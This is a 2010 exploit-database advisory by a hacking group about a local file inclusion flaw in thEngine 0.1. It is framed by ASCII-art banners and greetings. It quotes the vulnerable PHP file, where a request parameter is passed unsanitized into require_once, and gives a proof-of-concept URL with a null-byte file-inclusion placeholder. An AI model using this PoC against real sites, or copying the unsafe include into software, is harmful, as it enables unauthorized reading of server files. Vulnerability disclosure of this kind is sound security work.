thEngine 0.1 – Local File Inclusion

  • 作者: team_elite
    日期: 2010-05-04
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12504/
  • =============================================================================================
=============================================================================================
== @@@@@@@@@@@@@@@@@@@@@@@ @@ @@@@@@@@@@@@@@@@@@@@@@@@ ==
== @@@@@@@@@@@@@@@@@@@@@@@@ @@@	@@@@@@@@@@@@@@@@@@@@@@@@ ==
==@@ @@@@ @@@@ @ @ @@ @@@@@@ @@ @@ ==
==@@ @@@@ @@@@@ @@@ @@@@@@ @@ @@ ==
==@@ @@@@@@@@@@@@@@@ @ @@ @@@@@@@@@@ @@ @@@@@@ ==
==@@ @@@@ @@@@ @@ @@@@@@ @@ @@ ==
==@@ @@@@ @@@@ @@ @@@@@@ @@ @@ ==
==@@ @@@@@@@@ @@@@ @@ @@@@@@@@@@@@@@ @@ @@@@@@ ==
==@@ @@@@@@@@ @@@@ @@ @@@@@@@ @@@@@@@@@@@@@@ @@ @@@@@@ ==
==											 ==
=============================================================================================
=============================================================================================
			|||			|||
			|||			|||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~Greetz and Thanks to: All member manadocoding.net ~~~~
~~~~									~~~~
~~~~MC team : team_elite , devilbat , virusfree , doniskynet ,~~~~
~~~~lumut-- , kisame~~~~
~~~~~~~~
~~~~thanks for : cr4wl3r~~~~
~~~~~~~~
~~~~Discovered: team_elite[at]Auzs.net	~~~~
~~~~									~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
			|||			|||
			|||			|||
############################################################################
##									##			
##Download Script: http://sourceforge.net/projects/thengine/files/##
##									##
##Code [test.class.php]:						##
## 									##
############################################################################
			|||			|||
			|||			|||
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xx	<?php									xx
xx	/**									xx
xx	* thEngine								xx
xx	* Copyright (c) 2006 Thion, http://thion.jogger.pl			xx
xx	* This program is free software; you can redistribute it and/or modifyxx
xx	* it under the terms of the GNU Public General Public License asxx
xx	* published by the Free Software Foundation; either version 2.1 of thexx
xx	* License, or (at your option) any later version. xx
xx	*/									xx
xx										xx
xx	require_once('languages/'.$strLanguage.'/test.class.php');		xx
xx	class test								xx
xx	{									xx
xx	public function __construct()					xx
xx	{								xx
xx	global $opt;						xx
xx	$opt -> assign('message', TEST);				xx
xx 	 $opt -> display('test.tpl');					xx
xx	}								xx
xx	}									xx
xx	?>									xx
xx										xx
xx PoC: [thEngine_path]/modules/test/test.class.php?strLanguage=[LFI%00]xx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
* -,
* -@@ 
* -@@#
* -:@@; 
* - @@@@@......`
* -@@@@.@@@@@@@@@@@#
* - @@@@@@@@@@@@@@@@@@` 
* - @@@@@@@@@@@@@@@@@@@@; 
* -#@@@@@@@@@@@@@@@@@ 
* -`@@,@@@@@@@@@@@@@@@@@: 
* - @@@+@@@@@@@ @@@@@@@;@@@`
* - :@@@@@@@@@:@,; @@@@@@@ .@@
* -@@@@@@@@@@@:@@@@@@@@@@ 
* - @@@@' ` ` @@@@@@@@@:+.
* - .@@@@@@@@@@@@@ .
* - , +@@@@@@@@@@@@@
* -+@@@@@@@@@@@@@@@@@@@@# 
* - ,@@@@@@@@@@@@@@@@@ +@@@ 
* -`@@@@@@@@@@@@@@@@@@@ @@@ 
* - @@@@@@@@@@@@@@@@@@@ @@` 
* -@@@@@@@@@@@@@@@@@@ @@
* - +@@@@@@@@@@; @@@# @ 
* - @@@@@@@@@ : 
* - @@@@@@@@ ,@@
* -@@@@@@@@@ @@@' 
* -@@@@@@@`@ @@@; 
* -@@@@@@@@ @.@@@@@@@@
* -@@@@@@@@@@@@@@@@@@@@@@#
* - @@@@@@@@@@@@@@@@@@@@@@@@@@@ 
* - @ @@@@@@@ ;@@@@@@@@@@@@@@@@@
* - @ @@@@@@@@@@@@@@@@@@@,@@@@+ 
* - @@@@@@@@@@@@@@@@@@@@@@@ 
* - @@@ @@@@@@@@@@@@@@@; @@@@ 
* - @@@@@@@@@`@@@. @@.
* - @@; @@@@#:@@@@@# @@.
* - @ @@@: ;@ 
* -;` @@ ;@ 
* -@@@
* - @#
* - : : 
* --------------------------------------------->>>> bugs found on may 05 2010 by team_elite.
    Python